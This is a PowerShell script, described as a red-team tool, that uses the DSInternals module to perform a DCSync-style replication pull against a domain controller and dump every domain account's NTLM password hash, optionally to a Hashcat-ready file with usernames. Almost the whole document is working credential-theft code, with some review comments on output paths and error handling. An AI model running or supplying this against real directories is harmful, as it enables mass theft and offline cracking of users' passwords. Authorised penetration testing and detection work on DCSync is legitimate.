Extract-DsInternalsHash.ps1
<#PSScriptInfo
.VERSION 1.7
.GUID ff919e16-8346-42ed-8cc9-88abdfebf806
.AUTHOR Kalichuza
.COMPANYNAME
.COPYRIGHT
.TAGS
.LICENSEURI
.PROJECTURI
.ICONURI
.EXTERNALMODULEDEPENDENCIES
.REQUIREDSCRIPTS
.EXTERNALSCRIPTDEPENDENCIES
.RELEASENOTES
.PRIVATEDATA
#>

#Requires -Module DSInternals

<#
.DESCRIPTION
RedTeam Tool that utilizes DSInternals module to extract user domain password hashes.

.PARAMETER DomainController
Domain controller the DSInternals replication call is directed at (passed through to -Server).

.PARAMETER HashCat
When set, hashes are written to a file instead of being displayed as a table.

.PARAMETER IncludeUsernames
Only meaningful together with -HashCat: emits "hash:SamAccountName" lines instead of bare hashes.

.NOTES
Get-ADReplAccount -All pulls account secrets over the directory replication interface, so the
caller needs replication rights on the domain; this is the same access pattern defenders monitor
as "DCSync" activity, and it will show up in directory-service access auditing on the DC.
The file written with -HashCat holds credential material in clear and is not removed by the
script; handle and dispose of it accordingly.
#>
param (
    # Target DC; mandatory because Get-ADReplAccount needs an explicit -Server.
    [Parameter(Mandatory=$true)]
    [string]$DomainController,
    # Write output to a file in Hashcat format rather than to the console.
    [switch]$HashCat,
    # Append the SamAccountName to each hash line (file mode only; ignored otherwise).
    [switch]$IncludeUsernames
)

Import-Module DSInternals

try {
    # Extract NTLM hashes and convert them to hexadecimal format.
    # Where-Object drops accounts whose NTHash is empty/null, so the later per-byte
    # formatting never sees a missing value. NTHash is iterated element-wise and each
    # byte formatted as two upper-case hex digits, then joined into one string.
    $accounts = Get-ADReplAccount -All -Server $DomainController |
        Where-Object { $_.NTHash } |
        ForEach-Object {
            $hashHex = ($_.NTHash | ForEach-Object { $_.ToString("X2") }) -join ''
            [PSCustomObject]@{
                SamAccountName = $_.SamAccountName
                NTHashHex      = $hashHex
            }
        }

    # Check if the HashCat switch is used
    if ($HashCat) {
        # Path to save the output for Hashcat.
        # NOTE(review): relative path — resolved against the session's current location,
        # and an existing file of that name is silently overwritten by Out-File.
        $outputPath = "hashcat_ntlm_hashes.txt"

        # Check if IncludeUsernames switch is used and prepare output accordingly.
        # Line layout is "<hex hash>:<SamAccountName>" when usernames are included,
        # otherwise one bare hash per line; ASCII encoding avoids a BOM in the file.
        if ($IncludeUsernames) {
            $accounts | ForEach-Object { "$($_.NTHashHex):$($_.SamAccountName)" } | Out-File -FilePath $outputPath -Encoding ASCII
        } else {
            $accounts | ForEach-Object { $_.NTHashHex } | Out-File -FilePath $outputPath -Encoding ASCII
        }

        Write-Host "Hashes have been saved to $outputPath in Hashcat format."
    } else {
        # Display the output in a table format if the HashCat switch is not used
        $accounts | Format-Table -AutoSize
    }
} catch {
    # NOTE(review): the error goes to the host stream only — it is not re-thrown and not
    # written with Write-Error, so a caller cannot detect the failure via the error stream.
    Write-Host "An error occurred: $_"
}